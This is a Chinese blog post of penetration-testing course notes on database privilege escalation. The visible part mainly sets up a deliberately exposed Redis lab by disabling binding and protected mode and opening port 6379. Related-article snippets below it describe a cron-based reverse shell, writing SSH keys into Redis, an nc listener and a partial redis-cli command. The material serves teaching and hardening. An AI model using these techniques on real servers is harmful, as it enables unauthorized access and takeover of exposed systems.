第61天-权限提升-Redis&Postgre&令牌窃取&进程注

最新推荐文章于 2025-03-10 14:58:57 发布
原创 最新推荐文章于 2025-03-10 14:58:57 发布 · 890 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

本文详细介绍了Redis和PostgreSQL数据库的权限提升漏洞,包括如何利用未授权访问、计划任务、进程注入等手段进行提权。同时,文章也提供了一系列的修复方案,如设置访问密码、限制IP访问、修改默认端口、增强防火墙策略等,以加强系统的安全性。

思维导图

数据库提权

61-1

演示案例:

Redis 数据库权限提升-计划任务

环境搭建

服务器CentOS安装redis
wget http://download.redis.io/releases/redis-3.2.5.tar.gz
tar xzf redis-3.2.5.tar.gz
cd redis-3.2.5
make

61-3

修改配置文件,使可以远程访问
vim redis.conf

  • bind 127.0.0.1前面加上#号 或者设置为 0.0.0.0 支持其他ip地址访问

  • 保护模式:protected-mode改为no,否则无法远程连接

  • 设置后台运行:daemonize yes

  • 密码:修改requirepass xxxxx(你的密码)

设置ip,关闭保护模式。

设置后台运行

61-10

设置密码

云服务器开放端口

启动redis-server
./src/redis-server  redis.conf

默认的配置是使用6379端口,没有密码。

解决无法连接

连接redis,连接被拒绝

网上找了一圈资料,最后发现是没有开放端口6379的原因。

参考文章:centos访问redis_redis-manager如何连接(centos)

(明明服务器开放了,但是还需要开一下)

firewall-cmd --query-port=6379/tcp
如果返回结果为no,那么证明6379端口确实没有开启。


输入
firewall-cmd --add-port=6379/tcp
将6379端口开启,返回success


再次查询端口是否开放
firewall-cmd --query-port=6379/tcp
返回结果为yes

然后重新启动redis-server

./src/redis-server  redis.conf

就可以连接了。

最低0.47元/天 解锁文章
Redis服务安全加固
qq_40907977的博客
02-09 3575
转载来源 : https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186623.4.4.674b4b12XmJSTD 一.背景描述 1.漏洞描述 Redis 因配置不当存在未授权访问漏洞,可以被攻击者恶意利用。 在特定条件下,如果 Redis 以 root 身份运行,黑客可以给 root 账号入 SSH 公钥文件,直接通...
权限提升-Redis&Postgre&令牌窃取&进程
weixin_44805159的博客
10-13 346
#案例1.Redis数据库权限提升-计划任务Redis服务因配置不当,可被攻击者恶意利用。黑客借助Redis内置命令,可将现有数据恶意清空:如果Redis以root身份运行,黑客可往服务器上入SSH公钥文件,直接登录服务器。连接(未授权或有密码)-利用如下方法提权:参考:https://blog.youkuaiyun.com/fly_hps/article/details/80937837(1).利用计划任务执行命令反弹 shell (2). ssh-keygen 公钥然后使用私钥登陆 (3).权限较低web
61权限提升-Redis&Postgre&令牌窃取&进程入1
08-03
#数据库应用提权在权限提升中的意义#WEB 或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:Redis
权限提升-Redis&Postgre&令牌窃取&进程入Redis:
weixin_46425310的博客
08-02 296
权限提升-Redis&Postgre&令牌窃取&进程入Redis: 利用计划任务执行命令反弹shell:首先利用redis未授权访问漏洞或者已知密码,登录redis服务,然后在root权限下利用redis内置命令进行反弹shell先在自己的服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli -h 192.168.63.130 192.168.63.130:6379> set xx “\n*
【Windows提权】令牌窃取
ssrf
03-04 803
令牌(Token) 令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。 令牌有很多种: 访问令牌(Access Token):表示访问控制操作主体的
第100权限提升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务类
weixin_71529930的博客
06-03 993
cs的欧拉插件里面也有自动提取密码的模块,iis用户貌似是无法执行的,其他得有个普通用户的权限。运行以后这里由于版本问题,旧版的向日葵已经无法正常运行了,而新版的做了完整的限制。这里只能看到验证码,看不到识别码,主要学习思路,万一遇到了符合的版本就ok。利用cs时先生成后门,反弹shell这里不再赘述,不会的去翻看前面的文章。也可以利用这个msf进行破解,首先先生成后门建立连接,这里就不过多赘述。利用工具cs的欧拉插件,欧拉插件的下载地址。意一定是在这个会话下,执行下面的命令。利用命令进行连接数据库。
61权限提升-Redis&Postgre&令牌窃取&进程
san3144393495的博客
12-22 1446
主要讲解redis数据库和postgresql数据库,然后还要两个windows的提权方式令牌窃取进程入。postgresql是基于两个cve的漏洞,redis的提权方式第一种是利用任务执行的反弹shell,第二个是一个ssh-keygen的公钥使用私钥登录,这是因为redis默认搭建在redis上面,所以常用的就是ssh;权限较低的话还是可以进行webshell入。
Windows提权
小袁的博客
11-20 1663
windows提权学习过程中的一些总结
PsExec64.exe
09-17
用于获取软件中图片,可以在ctf 中给你一个软件后获取内容
内网渗透-权限提升
weixin_60329395的博客
08-26 1471
权限提升流程:信息收集-补丁筛选-利用MSF或特定EXP-西瓜到手漏洞库推荐:Vulmap、Wes、WindowsVulnScanwindows-exp-suggester在17年后未更新,不再推荐Vulmap是PowerShell脚本,使用最简单,但web提权往往只能有cmd窗口,不一定有PowerShell环境,导致该项目对Windows系统不友好Wes和WindowsVulnScan是python脚本,可以不借助PowerShell操作,更适用于web提权。...
提权及redis3种未授权访问
梳碧湖的砍柴人
10-07 855
redis及部分提权
系统入侵与提权之权限维持与Redis提权
最新发布
没有网络安全就没有国家安全
03-10 1547
系统入侵与提权之权限维持与Redis提权
命令行cmd执行不了PsExec64.exe的时候
qq_23600817的博客
07-05 4003
命令行执行不了PsExec64.exe的时候:cmd输入 C:\User\Administrator\Desktop\jdk+tomcat相关\PsExec64.exe  \\127.0.0.1 -u administrator -p Jtest12345 /s cmd 通过登录系统的用户administrator来执行。...
redis安全架构考虑事项
qq_28819551的博客
05-30 378
下面罗列出于安全需要考虑的一些事项 1.禁止一些高危命令 修改 redis.conf 文件,添加一下命令来禁用远程修改 DB 文件地址 rename-command FLUSHALL "" rename-command FLUSHDB "" rename-command SHUTDOWN "" rename-command CONFIG "" rename-command EVAL ...
redis未授权访问_任意文件入漏洞(提权):
qq_51862881的博客
03-01 534
redis未授权访问_任意文件入漏洞(提权)
使用PsExec工具
孙大圣的博客
11-11 2887
PsExec 是 Sysinternals 工具套件中的一部分,它可以让你在网络中的其他计算机上执行命令。使用 PsExec,管理员可以执行脚本、应用程序或其他命令,而无需手动在目标计算机上登录。下面详细介绍如何使用 PsExec 以及一些常见的用法和意事项。
【小迪安全web安全|渗透测试|网络安全 | 学习笔记-10
youngerll的博客
01-03 2503
【小迪安全web安全|渗透测试|网络安全 | 学习笔记-10
redis 普通用户启动
法海不懂
03-19 7877
漏洞描述 Redis 服务因配置不当,可被攻击者恶意利用。黑客借助 Redis 内置命令,可将现有数据恶意清空;如果 Redis 以 root 身份运行,黑客可往服务器上入 SSH 公钥文件,直接登录服务器。 受影响范围 对公网开放,且未启用认证的 Redis 服务器 修复方案 意:以下操作,均需重启 Redis 后才能生效。 绑定需要访问数据库的 IP。将Redis.co...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值